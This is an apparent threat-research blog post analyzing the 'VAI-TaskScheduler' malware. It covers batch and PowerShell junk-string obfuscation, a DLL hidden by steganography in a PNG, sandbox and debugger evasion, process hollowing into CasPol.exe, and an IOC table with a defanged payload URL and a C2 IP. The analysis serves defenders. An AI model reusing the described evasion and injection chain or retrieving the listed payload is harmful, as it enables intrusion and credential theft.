VAI-TaskScheduler Malware Analysis
Executive Summary – VAI-TaskScheduler Malware Overview
This post analyzes the obfuscation techniques used by the VAI-TaskScheduler malware and explains how the S4B Threat Research team extracted the associated indicators of compromise (IOCs). We refer to this sample as “VAI-TaskScheduler” based on the VAI method exposed by the DLL and its references to the Windows Task Scheduler.
This Windows malware has been observed being distributed as a batch script and leverages PowerShell, steganography, and process hollowing to deploy a .NET-based Remote Access Trojan (RAT) on compromised hosts. Additionally, it employs several tactics to complicate detection.
Moreover, the sample implements virtual machine and sandbox detection techniques to avoid exhibiting malicious behavior in controlled environments. When such conditions are detected, the malware terminates its execution immediately.
Sample Analysis of the VAI-TaskScheduler Malware
Batch Script Structure and Junk Substring Obfuscation in VAI-TaskScheduler Malware
The Silent4Business Threat Research team obtained a malware sample and performed a detailed analysis to understand its obfuscation and execution mechanisms on victim hosts.
The sample is a batch script that contains a Base64-encoded string, which in turn includes the substring cebad repeated across multiple segments:
These junk substrings are removed by the following command:
set "gleen=%gleen=%gleen:cebad=%"
Consequently, the script reconstructs the original encoded content before execution. The following figure illustrates how the junk substring is injected into the Base64 string that PowerShell later processes.
PowerShell Obfuscation and Payload Reconstruction
In addition to these junk substrings, the PowerShell command used to execute the payload is split across multiple variables. In this sample, the placeholder string areosystyle is inserted throughout the command and later removed in the same way as cebad in the previous example:
Once the junk substrings are removed and the command is reconstructed, the final PowerShell code resolves to the following instructions:
The resulting PowerShell code performs several actions:
- Configures the network connection to enforce the use of TLS 1.2.
- Creates a WebClient object to download the next-stage artifact.
- Downloads an image file containing a malicious DLL hidden using steganography.
- Loads the DLL directly into memory and invokes the VAI method exposed by the DLL.
As a result, the malware is able to execute its next-stage payload without writing the DLL to disk.
Steganography and DLL Extraction
After these steps, the image containing the DLL is downloaded. Inside this file, the embedded DLL (represented as a Base64 string) starts at offset 0x1538A8 and continues until the end of the file.
Once the DLL is extracted, we can use the Detect It Easy (DIE) tool to confirm that the file is a DLL and that it employs multiple obfuscation techniques.
Anti-Analysis, Anti-Debugging, and Virtual Machine Detection
A quick analysis of the DLL shows that it implements virtual machine detection mechanisms. If the sample detects virtualization, it avoids performing malicious activity and terminates its execution.
Within the DLL, we can also identify strings that suggest the presence of anti-debugging techniques. Strings such as IsDebuggerPresent, IsAttached, and dnSpy, among others, can be used by the malware to detect whether it is being debugged and terminate its malicious activity.
Process Hollowing Behavior Used by the VAI-TaskScheduler Malware
HackForums.gigajew Namespace and Injection Techniques
We also identified a namespace named HackForums.gigajew within the DLL. The methods it exposes suggest that it is used to inject malicious code into a legitimate process, using a technique consistent with process hollowing:
- Creates a process in a suspended state.
- Retrieves and modifies the thread context.
- Unmaps memory regions.
- Writes arbitrary data to memory.
- Resumes execution of the previously suspended thread.
Taken together, these steps are characteristic of classic process injection and process hollowing behavior.
CasPol.exe as the Injection Target
Execution of the sample in a controlled environment confirms that the CasPol.exe process is spawned. This matches the process name passed to the VAI function in the PowerShell script.
This process initiates a network connection to the IP address 172.245.112.200.
Analysis of the compromised host’s memory confirms the use of process hollowing for code injection.
Indicators of Compromise (IOCs)
| Type | Value | Description |
|---|---|---|
| SHA256 | 133bacca2fa5c5213a66dc6caa3b0accf4c152a2050cd7b794bbf833a3a71baa | script.bat |
| SHA256 | 5235618ca44454fadf0d76437bfc6741e121a12427be07a76198593400e7f620 | MSI_PRO_with_b64.png |
| SHA256 | a1edf9b9b8aab1ce9b5e17d73e2a9a2c45cfb1894417aac1361ce370718cbbfe | abortorium.dll |
| URL | hxxp[:]//ia601400[.]us[.]archive[.]org/10/items/msi-pro-with-b-64_20251023/MSI_PRO_with_b64[.]png | |
| IP | 172.245.112.200 |
Conclusions
During the analysis, we observed that the malware uses multiple obfuscation techniques to evade detection by security tools, as well as several mechanisms to avoid behavioral analysis in controlled environments such as sandboxes and virtual machines.
Based on available threat intelligence, we assess that the payload delivered by this malware is associated with a Remote Access Trojan (RAT) with information-stealing capabilities, including the theft of access credentials from compromised hosts.
Post Comment